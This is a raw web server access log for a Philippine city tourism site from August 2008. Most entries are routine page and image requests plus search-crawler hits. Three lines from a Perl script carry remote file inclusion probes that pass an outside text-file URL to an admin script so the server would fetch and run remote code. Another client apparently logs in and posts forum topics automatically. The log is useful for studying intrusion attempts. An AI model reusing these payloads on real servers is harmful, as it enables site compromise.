89.149.226.251 - - [28/Aug/2008:05:44:03 -0700] "GET /jodera2/index.php?sid=5eb10c863e229455100f0dbdbf5f7672 HTTP/1.0" 200 54950 "http://www.sancarloscity.org/jodera2/index.php?sid=5eb10c863e229455100f0dbdbf5f7672" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:44:04 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83970 "http://www.sancarloscity.org/jodera2/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:44:05 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 40968 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:44:23 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11438 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:44:24 -0700] "GET /jodera2/viewtopic.php?p=1661 HTTP/1.0" 200 24944 "http://www.sancarloscity.org/viewtopic.php?p=1661#1661" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:44:43 -0700] "GET /forum2/index.php?act=findpost&pid=556 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:44:48 -0700] "GET /forum2/index.php?s=a741da53ad33e80ffd374a79d0c5a96f&showtopic=102&st=0&p=556& HTTP/1.0" 200 8342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:46:54 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=1158 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:46:55 -0700] "GET /forum2/index.php?s=19252bf04b019f428819b4e4ac3e90a6&showtopic=190&st=0&p=1158& HTTP/1.0" 200 8720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:04 -0700] "GET / HTTP/1.1" 200 55575 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:05 -0700] "GET /antenna.css HTTP/1.1" 200 1748 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:05 -0700] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:07 -0700] "GET /bg_red_aurora.jpg HTTP/1.1" 200 32099 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:07 -0700] "GET /sccirtpan1.jpg HTTP/1.1" 200 25068 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:08 -0700] "GET /background_scci_top.jpg HTTP/1.1" 200 69602 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:08 -0700] "GET /bg_glass_bottomleft3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:09 -0700] "GET /bg_glass_bottomright3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:09 -0700] "GET /sccinewsidepan1.jpg HTTP/1.1" 200 29777 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:10 -0700] "GET /wheretostaytab2.jpg HTTP/1.1" 200 26860 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:10 -0700] "GET /wheretostaytab1.jpg HTTP/1.1" 200 25858 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:11 -0700] "GET /wheretoeattab2.jpg HTTP/1.1" 200 26730 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:11 -0700] "GET /wheretoeattab1.jpg HTTP/1.1" 200 25761 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:12 -0700] "GET /whattodotab2.jpg HTTP/1.1" 200 26426 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:12 -0700] "GET /whattodotab1.jpg HTTP/1.1" 200 25422 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:13 -0700] "GET /sampo/ HTTP/1.1" 200 2268 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:13 -0700] "GET /whattoseetab2.jpg HTTP/1.1" 200 26704 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:14 -0700] "GET /whattoseetab1.jpg HTTP/1.1" 200 25736 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:14 -0700] "GET /sccilinksicons.jpg HTTP/1.1" 200 33512 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:15 -0700] "GET /360maps.jpg HTTP/1.1" 200 12355 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:16 -0700] "GET /sccimidline.jpg HTTP/1.1" 200 22936 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:16 -0700] "GET /sccifrontpic.jpg HTTP/1.1" 200 61665 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:16 -0700] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 3233 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:16 -0700] "GET /qfalconbanner.jpg HTTP/1.1" 200 13256 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:17 -0700] "GET /sampo/Multichannel.swf HTTP/1.1" 200 65261 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:17 -0700] "GET /pplogobanner1.jpg HTTP/1.1" 200 29708 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:17 -0700] "GET /lolanitangslogofrnt.jpg HTTP/1.1" 200 4651 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:18 -0700] "GET /5star.jpg HTTP/1.1" 200 1016 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:18 -0700] "GET /ymblogo2new.gif HTTP/1.1" 200 8010 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:18 -0700] "GET /carmelslogo.jpg HTTP/1.1" 200 5824 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:19 -0700] "GET /4star.jpg HTTP/1.1" 200 960 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:19 -0700] "GET /sccinewsearch.jpg HTTP/1.1" 200 22686 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:19 -0700] "GET /sccisamplepage_02.gif HTTP/1.1" 200 7431 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:20 -0700] "GET /newpanmaster.png HTTP/1.1" 200 943 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:20 -0700] "GET /newpanmaster2.png HTTP/1.1" 200 927 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:21 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 32971 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:24 -0700] "GET /sampo/playlist.css HTTP/1.1" 200 559 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:24 -0700] "GET /sampo/flv/082008/1.jpg HTTP/1.1" 200 14434 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:24 -0700] "GET /sampo/flv/082008/2.jpg HTTP/1.1" 200 14217 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:25 -0700] "GET /sampo/flv/082008/2.jpg HTTP/1.1" 200 14217 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:25 -0700] "GET /sampo/flv/082008/3.jpg HTTP/1.1" 200 14264 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:26 -0700] "GET /sampo/flv/082008/1.jpg HTTP/1.1" 200 14434 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:26 -0700] "GET /sampo/flv/082008/4.jpg HTTP/1.1" 200 14273 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:47:27 -0700] "GET /sampo/flv/082008/5.jpg HTTP/1.1" 200 14280 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:47:31 -0700] "GET /forum2/index.php?act=Msg&CODE=4&MID=291 HTTP/1.0" 200 2880 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.31 - - [28/Aug/2008:05:47:32 -0700] "GET /jodera2/memberlist.php?sid=34787f4671614cb582a343a43cf6aac2 HTTP/1.0" 200 80949 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
141.85.101.1 - - [28/Aug/2008:05:47:34 -0700] "GET /logs/access_080807.log//admin/index.php?o=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 775 "-" "libwww-perl/5.805" "www.sancarloscity.org"
141.85.101.1 - - [28/Aug/2008:05:47:34 -0700] "GET //admin/index.php?o=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 752 "-" "libwww-perl/5.805" "www.sancarloscity.org"
141.85.101.1 - - [28/Aug/2008:05:47:35 -0700] "GET /logs//admin/index.php?o=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 757 "-" "libwww-perl/5.805" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:50 -0700] "GET / HTTP/1.1" 200 55575 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:51 -0700] "GET /antenna.css HTTP/1.1" 200 1748 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:51 -0700] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:52 -0700] "GET /sccirtpan1.jpg HTTP/1.1" 200 25068 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:52 -0700] "GET /background_scci_top.jpg HTTP/1.1" 200 69602 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:54 -0700] "GET /bg_glass_bottomleft3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:56 -0700] "GET /bg_glass_bottomright3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:57 -0700] "GET /sccinewsidepan1.jpg HTTP/1.1" 200 29777 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:57 -0700] "GET /sampo/ HTTP/1.1" 200 2268 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:57 -0700] "GET /bg_red_aurora.jpg HTTP/1.1" 200 32099 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:58 -0700] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 3233 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:58 -0700] "GET /wheretostaytab2.jpg HTTP/1.1" 200 26860 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
67.228.164.106 - - [28/Aug/2008:05:47:59 -0700] "GET /sphider/search.php HTTP/1.1" 200 2552 "-" "-" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:47:59 -0700] "GET /wheretostaytab1.jpg HTTP/1.1" 200 25858 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:00 -0700] "GET /wheretoeattab2.jpg HTTP/1.1" 200 26730 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:00 -0700] "GET /wheretoeattab1.jpg HTTP/1.1" 200 25761 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:01 -0700] "GET /whattodotab2.jpg HTTP/1.1" 200 26426 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:01 -0700] "GET /sampo/Multichannel.swf HTTP/1.1" 200 65261 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:02 -0700] "GET /whattodotab1.jpg HTTP/1.1" 200 25422 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:03 -0700] "GET /whattoseetab2.jpg HTTP/1.1" 200 26704 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:05 -0700] "GET /whattoseetab1.jpg HTTP/1.1" 200 25736 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:05 -0700] "GET /sccilinksicons.jpg HTTP/1.1" 200 33512 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:05 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 32971 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:07 -0700] "GET /sccimidline.jpg HTTP/1.1" 200 22936 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:08 -0700] "GET /sccifrontpic.jpg HTTP/1.1" 200 61665 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:08 -0700] "GET /sampo/playlist.css HTTP/1.1" 200 559 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:09 -0700] "GET /360maps.jpg HTTP/1.1" 200 12355 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:11 -0700] "GET /sampo/flv/082008/1.jpg HTTP/1.1" 200 14434 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:11 -0700] "GET /sampo/flv/082008/2.jpg HTTP/1.1" 200 14217 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:12 -0700] "GET /sampo/flv/082008/3.jpg HTTP/1.1" 200 14264 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:12 -0700] "GET /sampo/flv/082008/4.jpg HTTP/1.1" 200 14273 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:12 -0700] "GET /sampo/flv/082008/5.jpg HTTP/1.1" 200 14280 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:12 -0700] "GET /sampo/flv/082008/1.jpg HTTP/1.1" 200 14434 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:13 -0700] "GET /sampo/flv/082008/2.jpg HTTP/1.1" 200 14217 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:13 -0700] "GET /sampo/flv/082008/3.jpg HTTP/1.1" 200 14264 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:14 -0700] "GET /sampo/flv/082008/4.jpg HTTP/1.1" 200 14273 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:14 -0700] "GET /sampo/flv/082008/5.jpg HTTP/1.1" 200 14280 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:16 -0700] "GET /qfalconbanner.jpg HTTP/1.1" 200 13256 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:18 -0700] "GET /pplogobanner1.jpg HTTP/1.1" 200 29708 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:48:19 -0700] "GET /jodera2/login.php HTTP/1.0" 200 13249 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:26 -0700] "GET /lolanitangslogofrnt.jpg HTTP/1.1" 200 4651 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:29 -0700] "GET /5star.jpg HTTP/1.1" 200 1016 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:32 -0700] "GET /ymblogo2new.gif HTTP/1.1" 200 8010 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:48:32 -0700] "POST /jodera2/login.php?sid=c9be113c6af2a778699c9661d9d0973f HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:48:33 -0700] "GET /jodera2/index.php?sid=c9be113c6af2a778699c9661d9d0973f HTTP/1.0" 200 54947 "http://www.sancarloscity.org/jodera2/index.php?sid=c9be113c6af2a778699c9661d9d0973f" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:48:33 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83806 "http://www.sancarloscity.org/jodera2/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:48:34 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 40968 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:35 -0700] "GET /carmelslogo.jpg HTTP/1.1" 200 5824 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:38 -0700] "GET /4star.jpg HTTP/1.1" 200 960 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:40 -0700] "GET /sccinewsearch.jpg HTTP/1.1" 200 22686 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:45 -0700] "GET /sccisamplepage_02.gif HTTP/1.1" 200 7431 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
